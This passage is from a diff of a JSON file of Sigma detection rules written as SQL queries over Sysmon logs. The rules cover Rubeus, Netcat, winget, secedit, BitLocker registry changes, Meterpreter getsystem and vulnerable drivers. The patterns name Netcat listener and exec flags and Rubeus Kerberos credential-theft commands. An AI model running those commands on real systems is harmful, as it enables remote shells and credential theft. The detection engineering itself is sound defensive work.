ESCAPE '\\') OR (Hashes LIKE '%SHA256=0440ef40c46fdd2b5d86e7feef8577a8591de862cfd7928cdbcc8f47b8fa3ffc%' ESCAPE '\\' OR Hashes LIKE '%SHA256=9b1b15a3aacb0e786a608726c3abfc94968915cedcbd239ddf903c4a54bfcf0c%' ESCAPE '\\' OR Hashes LIKE '%SHA256=8e035beb02a411f8a9e92d4cf184ad34f52bbd0a81a50c222cdd4706e4e45104%' ESCAPE '\\' OR Hashes LIKE '%SHA256=d7c81b0f3c14844f6424e8bdd31a128e773cb96cccef6d05cbff473f0ccb9f9c%' ESCAPE '\\' OR Hashes LIKE '%SHA256=05b146a48a69dd62a02759487e769bd30d39f16374bc76c86453b4ae59e7ffa4%' ESCAPE '\\' OR Hashes LIKE '%SHA256=c8f9e1ad7b8cce62fba349a00bc168c849d42cfb2ca5b2c6cc4b51d054e0c497%' ESCAPE '\\' OR Hashes LIKE '%SHA1=31cc8718894d6e6ce8c132f68b8caaba39b5ba7a%' ESCAPE '\\' OR Hashes LIKE '%SHA1=a804ebec7e341b4d98d9e94f6e4860a55ea1638d%' ESCAPE '\\' OR Hashes LIKE '%SHA1=6debce728bcff73d9d1d334df0c6b1c3735e295c%' ESCAPE '\\' OR Hashes LIKE '%SHA1=cc65bf60600b64feece5575f21ab89e03a728332%' ESCAPE '\\' OR Hashes LIKE '%SHA1=3ef30c95e40a854cc4ded94fc503d0c3dc3e620e%' ESCAPE '\\' OR Hashes LIKE '%SHA1=b2f955b3e6107f831ebe67997f8586d4fe9f3e98%' ESCAPE '\\' OR Hashes LIKE '%MD5=10f3679384a03cb487bda9621ceb5f90%' ESCAPE '\\' OR Hashes LIKE '%MD5=04a88f5974caa621cee18f34300fc08a%' ESCAPE '\\' OR Hashes LIKE '%MD5=6fcf56f6ca3210ec397e55f727353c4a%' ESCAPE '\\' OR Hashes LIKE '%MD5=0f16a43f7989034641fd2de3eb268bf1%' ESCAPE '\\' OR Hashes LIKE '%MD5=ee6b1a79cb6641aa44c762ee90786fe0%' ESCAPE '\\' OR Hashes LIKE '%MD5=909f3fc221acbe999483c87d9ead024a%' ESCAPE '\\') OR sha256 IN ('0440ef40c46fdd2b5d86e7feef8577a8591de862cfd7928cdbcc8f47b8fa3ffc', '9b1b15a3aacb0e786a608726c3abfc94968915cedcbd239ddf903c4a54bfcf0c', '8e035beb02a411f8a9e92d4cf184ad34f52bbd0a81a50c222cdd4706e4e45104', 'd7c81b0f3c14844f6424e8bdd31a128e773cb96cccef6d05cbff473f0ccb9f9c', '05b146a48a69dd62a02759487e769bd30d39f16374bc76c86453b4ae59e7ffa4', 'c8f9e1ad7b8cce62fba349a00bc168c849d42cfb2ca5b2c6cc4b51d054e0c497') OR sha1 IN ('31cc8718894d6e6ce8c132f68b8caaba39b5ba7a', 'a804ebec7e341b4d98d9e94f6e4860a55ea1638d', '6debce728bcff73d9d1d334df0c6b1c3735e295c', 'cc65bf60600b64feece5575f21ab89e03a728332', '3ef30c95e40a854cc4ded94fc503d0c3dc3e620e', 'b2f955b3e6107f831ebe67997f8586d4fe9f3e98') OR md5 IN ('10f3679384a03cb487bda9621ceb5f90', '04a88f5974caa621cee18f34300fc08a', '6fcf56f6ca3210ec397e55f727353c4a', '0f16a43f7989034641fd2de3eb268bf1', 'ee6b1a79cb6641aa44c762ee90786fe0', '909f3fc221acbe999483c87d9ead024a')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%REG%' ESCAPE '\\' AND CommandLine LIKE '%ADD%' ESCAPE '\\' AND CommandLine LIKE '%\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\FVE%' ESCAPE '\\' AND CommandLine LIKE '%/v%' ESCAPE '\\' AND CommandLine LIKE '%/f%' ESCAPE '\\' AND (CommandLine LIKE '%EnableBDEWithNoTPM%' ESCAPE '\\' OR CommandLine LIKE '%UseAdvancedStartup%' ESCAPE '\\' OR CommandLine LIKE '%UseTPM%' ESCAPE '\\' OR CommandLine LIKE '%UseTPMKey%' ESCAPE '\\' OR CommandLine LIKE '%UseTPMKeyPIN%' ESCAPE '\\' OR CommandLine LIKE '%RecoveryKeyMessageSource%' ESCAPE '\\' OR CommandLine LIKE '%UseTPMPIN%' ESCAPE '\\' OR CommandLine LIKE '%RecoveryKeyMessage%' ESCAPE '\\'))" ], - "filename": "driver_load_win_mal_poortry_driver.yml" + "filename": "proc_creation_win_reg_bitlocker.yml" }, { - "title": "Vulnerable GIGABYTE Driver Load", - "id": "7bcfeece-e5ed-4ff3-a5fb-2640d8cc8647", + "title": "Add Potential Suspicious New Download Source To Winget", + "id": "c15a46a0-07d4-4c87-b4b6-89207835a83b", "status": "experimental", - "description": "Detects the load of a signed and vulnerable GIGABYTE driver often used by threat actors or malware for privilege escalation", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects usage of winget to add new potentially suspicious download sources", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.t1543.003" + "attack.defense_evasion", + "attack.execution", + "attack.t1059" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '6' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Hashes LIKE '%MD5=9AB9F3B75A2EB87FAFB1B7361BE9DFB3%' ESCAPE '\\' OR Hashes LIKE '%MD5=C832A4313FF082258240B61B88EFA025%' ESCAPE '\\' OR Hashes LIKE '%SHA1=FE10018AF723986DB50701C8532DF5ED98B17C39%' ESCAPE '\\' OR Hashes LIKE '%SHA1=1F1CE28C10453ACBC9D3844B4604C59C0AB0AD46%' ESCAPE '\\' OR Hashes LIKE '%SHA256=31F4CFB4C71DA44120752721103A16512444C13C2AC2D857A7E6F13CB679B427%' ESCAPE '\\' OR Hashes LIKE '%SHA256=CFC5C585DD4E592DD1A08887DED28B92D9A5820587B6F4F8FA4F56D60289259B%' ESCAPE '\\') OR md5 IN ('9ab9f3b75a2eb87fafb1b7361be9dfb3', 'c832a4313ff082258240b61b88efa025') OR sha1 IN ('fe10018af723986db50701c8532df5ed98b17c39', '1f1ce28c10453acbc9d3844b4604c59c0ab0ad46') OR sha256 IN ('31f4cfb4c71da44120752721103a16512444c13c2ac2d857a7e6f13cb679b427', 'cfc5c585dd4e592dd1a08887ded28b92d9a5820587b6f4f8fa4f56d60289259b')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\winget.exe' ESCAPE '\\' OR OriginalFileName = 'winget.exe') AND (CommandLine LIKE '%source %' ESCAPE '\\' AND CommandLine LIKE '%add %' ESCAPE '\\') AND CommandLine REGEXP '://\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}')" ], - "filename": "driver_load_win_vuln_gigabyte_driver.yml" + "filename": "proc_creation_win_winget_add_susp_custom_source.yml" }, { - "title": "Suspicious Driver Load from Temp", - "id": "2c4523d5-d481-4ed0-8ec3-7fbf0cb41a75", - "status": "test", - "description": "Detects a driver load from a temporary directory", + "title": "HackTool - Rubeus Execution", + "id": "7ec2c172-dceb-4c10-92c9-87c1881b7e18", + "status": "stable", + "description": "Detects the execution of the hacktool Rubeus via PE information of command line parameters", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.t1543.003" + "attack.credential_access", + "attack.t1003", + "attack.t1558.003", + "attack.lateral_movement", + "attack.t1550.003" ], "falsepositives": [ - "There is a relevant set of false positives depending on applications in the environment" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '6' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ImageLoaded LIKE '%\\\\Temp\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\Rubeus.exe' ESCAPE '\\' OR OriginalFileName = 'Rubeus.exe' OR Description = 'Rubeus' OR (CommandLine LIKE '%asreproast %' ESCAPE '\\' OR CommandLine LIKE '%dump /service:krbtgt %' ESCAPE '\\' OR CommandLine LIKE '%dump /luid:0x%' ESCAPE '\\' OR CommandLine LIKE '%kerberoast %' ESCAPE '\\' OR CommandLine LIKE '%createnetonly /program:%' ESCAPE '\\' OR CommandLine LIKE '%ptt /ticket:%' ESCAPE '\\' OR CommandLine LIKE '%/impersonateuser:%' ESCAPE '\\' OR CommandLine LIKE '%renew /ticket:%' ESCAPE '\\' OR CommandLine LIKE '%asktgt /user:%' ESCAPE '\\' OR CommandLine LIKE '%harvest /interval:%' ESCAPE '\\' OR CommandLine LIKE '%s4u /user:%' ESCAPE '\\' OR CommandLine LIKE '%s4u /ticket:%' ESCAPE '\\' OR CommandLine LIKE '%hash /password:%' ESCAPE '\\' OR CommandLine LIKE '%golden /aes256:%' ESCAPE '\\' OR CommandLine LIKE '%silver /user:%' ESCAPE '\\')))" ], - "filename": "driver_load_win_susp_temp_use.yml" + "filename": "proc_creation_win_hktl_rubeus.yml" }, { - "title": "Vulnerable HW Driver Load", - "id": "9bacc538-d1b9-4d42-862e-469eafc05a41", + "title": "PUA - Netcat Suspicious Execution", + "id": "e31033fc-33f0-4020-9a16-faf9b31cbf08", "status": "experimental", - "description": "Detects the load of a legitimate signed driver named HW.sys by often used by threat actors or malware for privilege escalation", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects execution of Netcat. Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network", + "author": "frack113, Florian Roth (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.t1543.003" + "attack.command_and_control", + "attack.t1095" ], "falsepositives": [ - "Unknown" + "Legitimate ncat use" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '6' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ImageLoaded LIKE '%\\\\HW.sys' ESCAPE '\\' OR (Hashes LIKE '%SHA256=4880F40F2E557CFF38100620B9AA1A3A753CB693AF16CD3D95841583EDCB57A8%' ESCAPE '\\' OR Hashes LIKE '%SHA256=55963284BBD5A3297F39F12F0D8A01ED99FE59D008561E3537BCD4DB4B4268FA%' ESCAPE '\\' OR Hashes LIKE '%SHA256=6A4875AE86131A594019DEC4ABD46AC6BA47E57A88287B814D07D929858FE3E5%' ESCAPE '\\' OR Hashes LIKE '%SHA1=74E4E3006B644392F5FCEA4A9BAE1D9D84714B57%' ESCAPE '\\' OR Hashes LIKE '%SHA1=18F34A0005E82A9A1556BA40B997B0EAE554D5FD%' ESCAPE '\\' OR Hashes LIKE '%SHA1=4E56E0B1D12664C05615C69697A2F5C5D893058A%' ESCAPE '\\' OR Hashes LIKE '%MD5=3247014BA35D406475311A2EAB0C4657%' ESCAPE '\\' OR Hashes LIKE '%MD5=376B1E8957227A3639EC1482900D9B97%' ESCAPE '\\' OR Hashes LIKE '%MD5=45C2D133D41D2732F3653ED615A745C8%' ESCAPE '\\') OR sha256 IN ('4880f40f2e557cff38100620b9aa1a3a753cb693af16cd3d95841583edcb57a8', '55963284bbd5a3297f39f12f0d8a01ed99fe59d008561e3537bcd4db4b4268fa', '6a4875ae86131a594019dec4abd46ac6ba47e57a88287b814d07d929858fe3e5') OR sha1 IN ('74e4e3006b644392f5fcea4a9bae1d9d84714b57', '18f34a0005e82a9a1556ba40b997b0eae554d5fd', '4e56e0b1d12664c05615c69697a2f5c5d893058a') OR md5 IN ('3247014ba35d406475311a2eab0c4657', '376b1e8957227a3639ec1482900d9b97', '45c2d133d41d2732f3653ed615a745c8')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\nc.exe' ESCAPE '\\' OR Image LIKE '%\\\\ncat.exe' ESCAPE '\\' OR Image LIKE '%\\\\netcat.exe' ESCAPE '\\') OR (CommandLine LIKE '% -lvp %' ESCAPE '\\' OR CommandLine LIKE '% -lvnp%' ESCAPE '\\' OR CommandLine LIKE '% -l -v -p %' ESCAPE '\\' OR CommandLine LIKE '% -lv -p %' ESCAPE '\\' OR CommandLine LIKE '% -l --proxy-type http %' ESCAPE '\\' OR CommandLine LIKE '% -vnl --exec %' ESCAPE '\\' OR CommandLine LIKE '% -vnl -e %' ESCAPE '\\' OR CommandLine LIKE '% --lua-exec %' ESCAPE '\\' OR CommandLine LIKE '% --sh-exec %' ESCAPE '\\')))" ], - "filename": "driver_load_win_vuln_hw_driver.yml" + "filename": "proc_creation_win_pua_netcat.yml" }, { - "title": "DLL Sideloading Of DBGHELP.DLL", - "id": "6414b5cd-b19d-447e-bb5e-9f03940b5784", + "title": "Potential Suspicious Activity Using SeCEdit", + "id": "c2c76b77-32be-4d1f-82c9-7e544bdfe0eb", "status": "experimental", - "description": "Detects DLL sideloading of \"dbghelp.dll\"", - "author": "Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)", + "description": "Detects potential suspicious behaviour using secedit.exe. Such as exporting or modifying the security policy", + "author": "Janantha Marasinghe", "tags": [ - "attack.defense_evasion", + "attack.discovery", "attack.persistence", + "attack.defense_evasion", + "attack.credential_access", "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" + "attack.t1562.002", + "attack.t1547.001", + "attack.t1505.005", + "attack.t1556.002", + "attack.t1562", + "attack.t1574.007", + "attack.t1564.002", + "attack.t1546.008", + "attack.t1546.007", + "attack.t1547.014", + "attack.t1547.010", + "attack.t1547.002", + "attack.t1557", + "attack.t1082" ], "falsepositives": [ - "Legitimate applications loading their own versions of the DLL mentioned in this rule" + "Legitimate administrative use" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ImageLoaded LIKE '%\\\\dbghelp.dll' ESCAPE '\\' AND NOT (((ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SoftwareDistribution\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SystemTemp\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\') OR (ImageLoaded LIKE '%\\\\Epic Games\\\\Launcher\\\\Engine\\\\Binaries\\\\ThirdParty\\\\DbgHelp\\\\dbghelp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Epic Games\\\\MagicLegends\\\\x86\\\\dbghelp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Anaconda3\\\\Lib\\\\site-packages\\\\vtrace\\\\platforms\\\\windll\\\\amd64\\\\dbghelp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Anaconda3\\\\Lib\\\\site-packages\\\\vtrace\\\\platforms\\\\windll\\\\i386\\\\dbghelp.dll' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\secedit.exe' ESCAPE '\\' OR OriginalFileName = 'SeCEdit') AND ((CommandLine LIKE '%/export%' ESCAPE '\\' AND CommandLine LIKE '%/cfg%' ESCAPE '\\') OR (CommandLine LIKE '%/configure%' ESCAPE '\\' AND CommandLine LIKE '%/db%' ESCAPE '\\')))" ], - "filename": "image_load_side_load_dbghelp_dll.yml" + "filename": "proc_creation_win_secedit_execution.yml" }, { - "title": "Potential System DLL Sideloading From Non System Locations", - "id": "4fc0deee-0057-4998-ab31-d24e46e0aba4", - "status": "experimental", - "description": "Detects DLL sideloading of DLLs usually located in system locations (System32, SysWOW64...)", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Potential Meterpreter/CobaltStrike Activity", + "id": "15619216-e993-4721-b590-4c520615a67d", + "status": "test", + "description": "Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service starting", + "author": "Teymur Kheirkhabarov, Ecco, Florian Roth", "tags": [ - "attack.defense_evasion", - "attack.persistence", "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" + "attack.t1134.001", + "attack.t1134.002" ], "falsepositives": [ - "Legitimate applications loading their own versions of the DLLs mentioned in this rule" + "Commandlines containing components like cmd accidentally", + "Jobs and services started with cmd" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ImageLoaded LIKE '%\\\\shfolder.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\activeds.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\adsldpc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\aepic.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\apphelp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\applicationframe.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\appxalluserstore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\appxdeploymentclient.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\archiveint.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\atl.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\audioses.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\auditpolcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\authfwcfg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\authz.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\avrt.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bcd.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bcp47langs.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bcp47mrm.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bcrypt.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cabinet.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cabview.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\certenroll.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cldapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\clipc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\clusapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cmpbk32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\coloradapterclient.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\colorui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\comdlg32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\connect.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\coremessaging.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\credui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptbase.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptdll.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptxml.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cscapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cscobj.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cscui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d2d1.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d10.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d10\\_1.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d10\\_1core.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d10core.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d10warp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d11.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d12.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d9.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dataexchange.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\davclnt.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dcomp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\defragproxy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\desktopshellext.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\deviceassociation.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\devicecredential.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\devicepairing.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\devobj.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\devrtl.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dhcpcmonitor.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dhcpcsvc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dhcpcsvc6.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\directmanipulation.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dismapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dismcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmcfgutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmcmnutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmenrollengine.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmenterprisediagnostics.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmiso8601utils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmoleaututils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmprocessxmlfiltered.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmpushproxy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmxmlhelputils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dnsapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dot3api.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dot3cfg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\drprov.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dsclient.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dsparse.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dsreg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dsrole.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dui70.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\duser.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dusmapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dwmapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dwrite.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dxgi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dxva2.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\eappcfg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\eappprxy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\edputil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\efsadu.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\efsutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\esent.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\execmodelproxy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\explorerframe.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fastprox.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\faultrep.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fddevquery.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\feclient.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fhcfg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\firewallapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\flightsettings.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fltlib.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fveapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fwbase.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fwcfg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fwpolicyiomgr.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fwpuclnt.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\getuname.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\hid.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\hnetmon.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\httpapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\idstore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ieadvpack.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iedkcs32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iertutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ifmon.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iphlpapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iri.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iscsidsc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iscsium.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\isv.exe\\_rsaenh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\joinutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ksuser.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ktmw32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\licensemanagerapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\licensingdiagspp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\linkinfo.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\loadperf.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\logoncli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\logoncontroller.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\lpksetupproxyserv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\magnification.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mapistub.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mfcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mfplat.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\midimap.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\miutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mlang.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mmdevapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mobilenetworking.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mpr.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mprapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mrmcorer.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msacm32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mscms.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mscoree.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msctf.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msctfmonitor.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msdrm.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msftedit.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msutb.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mswb7.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mswsock.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msxml3.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mtxclu.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\napinsp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ncrypt.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ndfapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netid.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netiohlp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netplwiz.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netprofm.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netsetupapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netshell.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\networkexplorer.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\newdev.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ninput.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nlaapi.dll' 